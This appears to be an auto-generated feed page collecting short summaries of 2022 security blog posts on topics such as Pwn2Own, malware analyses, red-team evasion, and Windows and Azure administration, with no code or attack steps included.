    So you’ve heard of Pwn2Own and think you are up to the challenge of competing in the world’s most prestigious hacking competition. Great! We would love to have you! However, there are a few things you should know before we get started. With Pwn2Own Vancouver just around the corner, here are 10 things you need to know before participating in Pwn2Own. 1. You need to register before the contest. We try to make this as apparent as possible in the rules, but we still have people walk into the room on the first day of the contest hoping to participate. There are a lot of logistics around Pwn2Own, so we need everyone to complete their registration before the contest starts. We can’t support anyone who wants to join on the first day of the competition. 2. You need to answer the vetting em…

    Sending email anonymously through Exchange Servers
    The purpose of this article is to raise awareness of the possibility of sending mail anonymously through Microsoft Exchange Servers and to show mitigations for the resulting risks. After setting up Exchange Server 2019, you might be unaware that it's possible to send mail anonymously to internal recipients by default. This means that, using PowerShell, for example, anyone in your LAN may send messages to internal accounts without revealing their identity. Sending email anonymously through Exchange Servers first appeared on 4sysops.  ( 8 min )

    Impacket v0.10.0 Now Available
    Today, we are pleased to announce the release of the latest version of Impacket, our collection of Python classes for working with network protocols, and much more. Impacket release 0.10.0 is available now and brings several new features and enhancements including a refreshed NTLMrelayx, the Kerberos Key List attack implementation, a refactored Credential Cache, the sunsetting […] The post Impacket v0.10.0 Now Available appeared first on SecureAuth.  ( 7 min )


    Why HackerOne Acquired Pull Request and What It Means to Our Customers
    No content preview  ( 3 min )

    Add a language pack in Windows 11
    Microsoft started to provide language packs as Language Experience Packs (LXP) in Windows 10 1903. At the same time, LPs have still been shipped as CAB files. The duplicate formats have led to inconsistent administration of language settings. Windows 11 now removes some of these issues. Add a language pack in Windows 11 first appeared on 4sysops.  ( 6 min )

    Themes from Real World Crypto 2022
    By William Woodruff Last week, over 500 cryptographers from around the world gathered in Amsterdam for Real World Crypto 2022, meeting in person for the first time in over two years. As in previous years, we dispatched a handful of our researchers and engineers to attend the conference, listen to talks, and schmooze observe the […]  ( 13 min )

    A Visual Summary of SANS CloudSecNext Summit 2022
    SANS Cloud Security Blog pertaining to a summary of the SANS CloudSecNext Summit  ( 5 min )
    6 Reasons SANS 2022 Security Awareness Summit is a Must-Attend
    The agenda for the SANS 2022 Security Awareness Summit, Aug. 3-4, is live and the event is epic!  ( 6 min )


    Shellcode: Linux on RISC-V 64-Bit
    RISC-V (pronounced “risk-five”) is an open standard instruction set architecture (ISA) based on established reduced instruction set computer (RISC) principles. Unlike most other ISA designs, RISC-V is provided under open source licenses that do not require fees to use. … Continue reading →  ( 4 min )

    Amplify Your Existing Risk Efforts
    Red team input can break prevailing “business as usual” perspectives, processes, priorities, and planning. Then again, an unexpected adversarial event can do the same, only worse (pay a little now or pay a lot later).

    Announcing the Results of the 12-month DIB-VDP Pilot
    No content preview  ( 2 min )

    Moshen Dragon’s Triad-and-Error Approach | Abusing Security Software to Sideload PlugX and ShadowPad
    Chinese-aligned APT group Moshen Dragon caught sideloading malware through multiple AV products to infect telecoms sector.  ( 5 min )

    Configuring SSO between Active Directory and Azure using pass-through authentication
    Pass-through authentication is an alternative to AD FS and password hash synchronization in Azure AD. This technology allows users to access cloud apps after authenticating against the local Active Directory. The configuration of pass-through authentication is less complex than that of AD FS, for example. Configuring SSO between Active Directory and Azure using pass-through authentication first appeared on 4sysops.  ( 7 min )

    Girls Day at NVISO Encourages Young Guests To Find Their Dream Job
    NVISO employees in Frankfurt and Munich showcased their work in Cybersecurity to the girls with live hacking demos, a view behind the scenes of NVISO and hands-on tips for their personal online security. Participating in the Germany-wide “Girls Day”, we further widened the field of future career choices for the young visitors and brought … Continue reading Girls Day at NVISO Encourages Young Guests To Find Their Dream Job →

    Beautiful Basics - Series
    Today I keynoted @BSidesVancouver. It was an honor to be asked and I had a great time. Conference Link: https://hopin.com/events/bsides-vancouver-2022/

    I talked about 11 lessons learned over my career that contradict some of the edicts that are well known in the Cyber Security space. Before we get into the lessons though, let me attack the things I know many of you reading this already have queued up in your head.

    Counter Point 1: “All of that is well and good, but it’ll never work where I work.” Why not? Every single one of these lessons learned is something that I was told wasn’t possible. For the most part they were things I didn’t even do; they were things either already in place when I joined the company or put into place while I worked there. I saw first hand that something I was told was “impossible” was not only possible but accomplished much more than I could have imagined. Until you see something for yourself, it’s hard to go against what you are taught, but as Security Professionals isn’t that what we are supposed to do? Look beyond the scope of what is seen as “possible”?

    Counter Point 2: “It’s not as easy as you are making it sound.” You are right, none of this is easy. Good work hardly ever is. If you are looking for the easy solution, something that can be done in a day or a week, this is not the blog series for you.

    Counter Point 3: “We already know all of this.” Awesome! I wish I would have known these things earlier in my career.

    Lessons Learned: Lesson 1, Lesson 2, Lesson 3, Lesson 4, Lesson 5, Lesson 6, Lesson 7, Lesson 8, Lesson 9, Lesson 10, Lesson 11  ( 1 min )

    Vulnerability Management Resources
    SANS Vulnerability Management Resources for Cloud and Enterprise collected in one place for easy access  ( 8 min )


    Overview of Content Published in April
    Here is an overview of content I published in April: Blog posts: Power Consumption Of A Philips Hue lamp In Off State .ISO Files With Office Maldocs & Protected View in Office 2019 and 2021 New Tool: myjson-filter.py Update: cut-bytes.py Version 0.0.14 Update: 1768.py Version 0.0.13 New Tool: pngdump.py (Beta) Update: re-search.py Version 0.0.19 Update: […]  ( 3 min )


    Quickpost: Machine Code Infinite Loop
    Someone asked me what the byte sequence is for an infinite loop in x86 machine code (it’s something you could use while debugging, for example). That byte sequence is just 2 bytes long: EB FE. It’s something you can check with nasm, for example. File jump-infinite-loop.asm: nasm jump-infinite-loop.asm -l jump-infinite-loop.lst File jump-infinite-loop.lst: Quickpost info  ( 3 min )


    One Year to I/O Ring: What Changed?
    […]  ( 13 min )

    Adventures in the land of BumbleBee – a new malicious loader
    BUMBLEBEE is a new malicious loader that is being used by several threat actors and has been observed to download different malicious samples. This post provides our initial analysis  ( 5 min )

    Analyzing VSTO Office Files
    VSTO Office files are Office document files linked to a Visual Studio Office File application. When opened, they launch a custom .NET application. There are various ways to achieve this, including methods to serve the VSTO files via an external web server. An article was recently published on the creation of these document files for … Continue reading Analyzing VSTO Office Files →

    Update: oledump.py Version 0.0.65
    This new version of oledump.py brings a new plugin (plugin_metadata) and Python 3 fixes for 2 plugins (plugin_msi and plugin_ppt). The new plugin is actually an old unpublished plugin, that I updated recently. This plugin parses Office document metadata as defined in document [MS-OLEPS]. I started to write this in 2015 to parse the metadata […]  ( 3 min )

    Create a Hyper-V virtual switch with PowerShell
    In this second post in my series about Hyper-V management with PowerShell I will explain how to create a Hyper-V virtual switch with PowerShell. In my previous post I explained how to install Hyper-V with PowerShell. Virtual switch types Create a Hyper-V virtual switch with PowerShell first appeared on 4sysops.  ( 3 min )

    A Primer on Neurodiversity in Cybersecurity
    No content preview  ( 7 min )


    Guest who? Insecure Azure Defaults!
    Introduction Azure has an insecure default guest user setting, and your organization is probably using it. The default settings Azure provides would allow any user within the organization (including guest users) to invite guest users from any domain, bypassing any central identity management solutions (e.g. Okta, Auth0) and onboarding processes. Additionally, an attacker may use […] The post Guest who? Insecure Azure Defaults! appeared first on Praetorian.  ( 6 min )

    LAPSUS$: Recent techniques, tactics and procedures
    This post describes the techniques, tactics and procedures we observed during recent LAPSUS$ incidents.  ( 5 min )

    Cortex XSOAR Tips & Tricks – Execute Commands Using The API
    Introduction Every automated task in Cortex XSOAR relies on executing commands from integrations or automations either in a playbook or directly in the incident war room or playground. But what if you wanted to incorporate a command or automation from Cortex XSOAR into your own custom scripts? For that you can use the API. In … Continue reading Cortex XSOAR Tips & Tricks – Execute Commands Using The API →

    Install Hyper-V with PowerShell
    In this first post of my series about managing Hyper-V with PowerShell I will outline how to install Hyper-V Server and the Hyper-V role with PowerShell. Install Hyper-V with PowerShell first appeared on 4sysops.  ( 3 min )

    A Red Teamer’s Guide to Analyzing Propaganda, Part 1
    Korzybski to the rescue once again! In part 1, we look at how two-valued orientation can shape and constrain thinking.


    LockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility
    Long-running LockBit ransomware attempts to evade Windows ETW, AMSI and EDR by leveraging legitimate VMware logging command line utility.  ( 8 min )

    Confused by agents? We've cleaned up our jargon ...
    Speaking to Burp Suite Enterprise Edition users, one thing has come up time and time again as a blocker to your understanding of the product. This has been our use of the term "agent" when describing  ( 3 min )
    Burp Suite Enterprise Edition: config tips for scanning success
    Burp Suite Enterprise Edition is the dynamic web vulnerability scanner that can help you to secure your whole portfolio. To help you achieve that, this article contains some advice on how to optimize  ( 3 min )

    SecureAuth Announces New Behavioral Modeling Patents to Fortify Passwordless Continuous Authentication
    Innovative Method of Biobehavioral Credentials Deliver Frictionless Authentication to Prevent Fraud using Dynamic Level of Assurance IRVINE, Calif. – April 25 2022 – SecureAuth, a leader in next-generation access management and authentication, announces that the United States Patent and Trademark Office (USPTO) granted the company four groundbreaking methods for authenticating users’ claimed identities for frictionless […] The post SecureAuth Announces New Behavioral Modeling Patents to Fortify Passwordless Continuous Authentication appeared first on SecureAuth.  ( 5 min )

    Python module Paramiko for managing CISCO devices: Installation and usage example
    The Python module Paramiko enables you to leverage Python to automate the management of CISCO routers and switches. In this guide, I will explain how to install Paramiko via pip and provide a usage example. The module makes Python act as an SSH client or server, enabling us to automate any device to which we can connect via SSH. Python module Paramiko for managing CISCO devices: Installation and usage example first appeared on 4sysops.  ( 7 min )

    4 Tips to Successfully Prepare for the SSAP Exam
    The SANS Security Awareness Professional (SSAP) is the world’s leading industry-recognized credential that signifies that the holder has the knowledge and expertise to build, maintain and measure a mature security awareness program.  ( 5 min )


    Learning Machine Learning Part 2: Attacking White Box Models
    In the previous post, I went through a very brief overview of some machine learning concepts, talked about the Revoke-Obfuscation project…  ( 20 min )

    CloudGoat goes Serverless: A walkthrough of Vulnerable Lambda Functions
    The post CloudGoat goes Serverless: A walkthrough of Vulnerable Lambda Functions appeared first on Rhino Security Labs.  ( 5 min )

    Real World Cryptography Conference 2022
    The IACR’s annual Real World Cryptography (RWC) conference took place in Amsterdam a few weeks ago. It remains the best venue for highlights of cryptographic constructions and attacks for the real world. While the conference was fully remote last year, this year it was a 3-day hybrid event, live-streamed from a conference center in charming … Continue reading Real World Cryptography Conference 2022 →  ( 21 min )

    Improving the state of go-fuzz
    By Christian Presa Schnell During my winternship, I used the findings from recent Go audits to make several improvements to go-fuzz, a coverage-based fuzzer for projects written in Go. I focused on three enhancements to improve the effectiveness of Go fuzzing campaigns and provide a better experience for users. I contributed to fixing type alias […]  ( 9 min )

    Export and import passwords in Firefox
    Since version 80, Firefox has allowed you to import passwords in CSV format. This can be used, for example, to export passwords from Firefox and transfer them to another PC. If you format the data accordingly, you can also import them from other programs, such as password managers. Export and import passwords in Firefox first appeared on 4sysops.  ( 5 min )


    Introduction to VirtualBox security research
    Introduction This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components. We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball inste…  ( 11 min )

    Exodus Wants to help CISA Shields Up
    CISA Shields Up in response to looming Russian Cyberattacks, Exodus Intelligence wants to help. The Cybersecurity and Infrastructure Security Agency (CISA) recently launched the #ShieldsUp Campaign to provide organizations resources and recommended actions to heighten their security posture in light of the Russian invasion of Ukraine. Evolving intelligence indicates that the Russian Government is exploring ... The post Exodus Wants to help CISA Shields Up appeared first on Exodus Intelligence.  ( 1 min )

    Passwordless authentication with FIDO2 and Azure Active Directory
    Getting rid of unsecure password authentication is becoming a priority for many businesses. Companies using Microsoft's Azure Active Directory have many options to implement passwordless authentication. One of these is using a FIDO2 security key. Passwordless authentication with FIDO2 and Azure Active Directory first appeared on 4sysops.  ( 6 min )

    SecureAuth Latest Release Delivers Enhanced Passwordless Authentication with Improved User Experience
    Organizations Now Have the Ability to Use Common FIDO2 Experience Across Browsers, Conditional Passwordless, Hybrid and Cloud Deployment for Azure AD Support As we emerge from the pandemic, trends of digital transformation with a dispersed workforce and a complete restructuring of Information Technology (IT) and Operational Technology (OT) architecture accelerates the need for security and […] The post SecureAuth Latest Release Delivers Enhanced Passwordless Authentication with Improved User Experience appeared first on SecureAuth.  ( 4 min )


    Which DFIR Summit Mascots do you want to see as Lego giveaways this year? Vote now!
    Join us this year at the 2022 SANS DFIR Summit Live Online or attend in Austin! If you’ve attended before, you know you’ll walk away from the summit with a story, connection, and maybe even one of those limited edition DFIR Mascot Legos. If it’s your first time attending, we look forward to meeting you at the most comprehensive DFIR event of the year!  ( 8 min )


    Update: re-search.py Version 0.0.19
    This is a Python3 stdin fix for re-search.py, my tool to search with regular expressions. re-search_V0_0_19.zip (http) MD5: 4007A3E5540871221B55591B50E2239B SHA256: 263236ABE75B93F1F999474D690A9EB2575EBE42CED8F369FF98B349A5116D11  ( 3 min )

    Bypassing PESieve and Moneta (The "easy" way....?)
    Table of Contents: Introduction; Moneta and the first IOC; Moneta and the final IOC; The PeSieve Bypass; Conclusion. TLDR; POC is here: https://github.com/waldo-irc/YouMayPasser/. Usage isn't super straight forward but I'd rather it wasn't. Good Luck! Introduction The title  ( 19 min )

    Home-Grown Red Team: Bypassing Windows 11 Defenses With Covenant C2 and Nimcrypt2
    I know your question. Why would anybody want to use Covenant C2? It’s not supported, it’s outdated and everybody has moved on! Let’s at…  ( 4 min )


    Writing an AWS Lambda function using Go (Golang)
    In my last article, titled "What is serverless computing? An introduction to AWS Lambda," we took a detailed look at what serverless computing does. Taking the next step, we will create a working example in AWS Lambda using the Go programming language (often referred to as Golang). Writing an AWS Lambda function using Go (Golang) first appeared on 4sysops.  ( 9 min )

    The Russia-Ukraine Conflict. Cyber Resource Center
    Get access to resources that will help your organization navigate the cyber risks associated with the Russia-Ukraine conflict.  ( 8 min )


    Infosec Salaries – the myth and the reality
    Every once in a while someone drops a salary bomb discussion on social media and the speculations follow. The salary bomb value du jour is the mythical 450K USD […]  ( 6 min )

    Home-Grown Red Team: Testing Common AV Evasion With PE Packers On Windows 11
    Bypassing AV solutions is essential for initial access, lateral movement and full domain compromise. Over the last couple of years, we’ve…  ( 4 min )

    Yeah, It’s Tough but We’re Tougher
    Times are volatile, and everyone we encounter seems slightly on edge. In an environment like this, it’s no surprise that red teaming is tough. But that’s no excuse for us to throw up our hands. It just means we need to revisit our fundamental mission and work harder than ever to refine our red teaming methods and manners.

    Nokoyawa Ransomware | New Karma/Nemty Variant Wears Thin Disguise
    Nemty developers have created a new, flawed update to the Karma ransomware variant in a bid to avoid detection and mislead attribution.  ( 7 min )

    How Wix Improves Their Security Posture with Ethical Hackers
    Reducing risk is fundamental to Wix’s approach to cybersecurity, and as the threat landscape evolves, they turn to HackerOne Bounty to protect their security posture. Since 2018, Wix has invited tens of thousands of ethical hackers worldwide to ensure new and existing features are secure. We recently met with two Wix security team members to learn how they leverage ethical hackers to detect risks before they become threats and how vulnerability insights help strengthen their security posture.  ( 7 min )
2022-05-21T01:01:25.020Z osmosfeed 1.14.4